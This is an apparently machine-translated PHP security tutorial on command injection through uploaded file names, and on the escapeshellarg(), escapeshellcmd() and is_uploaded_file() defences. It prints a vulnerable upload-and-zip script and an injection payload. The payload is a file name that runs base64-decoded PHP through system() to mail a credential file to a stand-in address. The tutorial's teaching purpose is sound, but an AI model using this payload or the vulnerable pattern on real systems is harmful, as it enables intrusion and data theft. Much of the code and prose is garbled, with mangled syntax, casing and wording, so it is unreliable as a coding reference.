PHP security (2)

File to compress:

Although this program seems to be quite easy to understand, malicious users can use it through some ways. The most serious security problem exists in us to execute the compression command (via the `operator), you can clearly see this in the row below: if (isset ($ _ files ['file')) {

$ TMP_NAME = $ _files ['file'] ['TMP_NAME'];

$ CMP_NAME = DIRNAME ($ _ files ['file'] ['TMP_NAME']).

"/ $_files['file'][name']}.zip";

$ filename = basename ($ CMP_NAME);

IF (file_exists ($ tmp_name)) {

$ systemcall = "$ zip $ cmp_name $ tmp_name";

$ output = `$ systemcall`;

...

Deception program performs any shell command

Although this code looks quite safe, it has the potential risk of performing any shell command for any file uploaded authority!

Accurately, this security vulnerability comes from the assignment of the $ cmp_name variable. Here, we hope that the compressed file uses the file name (with the .zip extension) on the client. We use $ _files ['file'] ['name'] (which contains the file name when the upload file is in the client).

In this case, malicious users can achieve their own purposes by uploading a file containing a special sense character in the underlying operating system. For example, what if the user creates an empty file in the form below? (UNIX shell prompt)

[User @ localhost] # Touch "; php -r '/ $ code = base64_decode (/////

/ "BWFPBCBIYWR1C2VYQHNVBWV3AGVYZS5JB20GPCAVZXRJL3BHC3N3ZA == ///");

SYSTEM (/ $ code); '; "

This command will create a file as follows:

; pHP -R '$ code = base64_decode

/ "BWFPBCBIYWR1C2VYQHNVBWV3AGVYZS5JB20GPCAVZXRJL3BHC3N3ZA == /");

System ($ CODE); ';

It looks very strange? Let's take a look at this "file name", we found that it is like a command to perform the following code:

$ Code = Base64_Decode

/ "BWFPBCBIYWR1C2VYQHNVBWV3AGVYZS5JB20GPCAVZXRJL3BHC3N3ZA == /");

System ($ CODE);

?>

If you show the content of $ code variable for curios, it will find that it contains mail baguser@somewhere.com

/ usr / bin / zip / tmp /; pHP -R

'$ code = base64_decode

/ "bwfpbcbiywr1c2vyqhnvbwv3agvyzs5jb20gpcavzxrjl3bhc3n3za==/" );system ( $),';.zip / tmp / phpy4iati

It's surprising, the order on the upper is not a statement but 3! Since UNIX shell explains the semicolon (;) as the end of a shell command, the beginning of the other command, in addition to the semicolon in the quotation mark, the php's system () will actually perform:

[User @ localhost] # / usr / bin / zip / tmp /

[User @ localhost] # php -r

'$ code = base64_decode

/ "BWFPBCBIYWR1C2VYQHNVBWV3AGVYZS5JB20GPCAVZXRJL3BHC3N3ZA == /");

SYSTEM ($ CODE); '

[User @ localhost] # .zip / tmp / phpy4iati

As you can see, this seems harmful PHP suddenly becomes the back door that performs any shell command and other PHP. Although this example is only valid on the system of the CLI version of the PHP in the path, it can be used to achieve the same effect by other methods.

Anti-system call attack

The key here is still, from the user's input, regardless of the content, you should not believe! The problem is still how to avoid similar situations when using system calls (except for them). In order to fight this type of attack, PHP provides two functions, escapeshellarg () and escapeshellcmd ().

The escapeshellarg () function is designed to be designed for user input from the user of the parameter used as the system command (in our example, it is a zip command) to design a potentially dangerous character. The syntax of this function is as follows:

Escapeshellarg ($ String)

$ String is located for filtering input, and the return value is a filtered character. When executed, this function will add a single quotation number on both sides of the character and escape the single quotes in the original string (plus it before). In our routine, if we add these lines before executing the system command:

$ cmp_name = escapeshellarg ($ CMP_NAME);

$ TMP_NAME = escapeshellarg ($ TMP_NAME);

We can handle the parameters that pass to ensure that the parameters calls are handled, is a user input without other intentions to avoid such security risks.

Escapeshellcmd () and escapeeshellarg () are similar, but it only escapes characters with special meaning against the underlying operating system. Unlike EscapeShellarg (), escapeshellcmd () does not handle blank grid in content. For an example, characters when using escapeeshellcmd () escape

$ String = "'Hello, World!'; EvilCommand"

It will become:

/ 'Hello, World /' /; EvilCommand

If this string is used as a parameter for the system call, it will still not get the correct result, because the shell will explain it to two separate parameters: / 'Hello and World /' /; EvilCommand. If the user enters the parameter list part for the system call, escapeshellarg () is a better choice.

Protect uploaded files

In the entire article, I have been only highlighted how the system call is hijacked by malicious users to produce our unwind results.

However, there is another potential security risk here to be mentioned. See our routines, focus on the line below:

$ TMP_NAME = $ _files ['file'] ['TMP_NAME'];

$ CMP_NAME = DIRNAME ($ _ files ['file'] ['TMP_NAME']).

"/ $_files['file'][name']}.zip";

$ filename = basename ($ CMP_NAME);

IF (file_exists ($ tmp_name)) {

A potential security risk caused by the code line in the upper side segment is that the last line we judge whether or not the uploaded file actually exists (exists in temporary file name $ TMP_NAME).

This security risk does not come from PHP itself, but is that the file name saved in $ TMP_NAME is actually not a file, but points to malicious users want access to files, such as / etc / passwd.

To prevent such cases, PHP provides an Is_UPLOADED_FILE () function, which is the same as File_exists (), but it also provides the file that is really uploaded from the client.

In most cases, you will need to move uploaded files, and PHP provides the Move_uploaded_File () function to match IS_UPLOADED_FILE (). This function is used for mobile files as if it is automatically checked before executing to ensure that the mobile file is automatically checked. The syntax of the move_uploaded_file () is as follows:

Move_uploaded_file ($ FileName, $ Destination);

When executed, the function will move the upload file $ filename to the destination $ DESTINATION and return a boolean value to mark whether the operation is successful.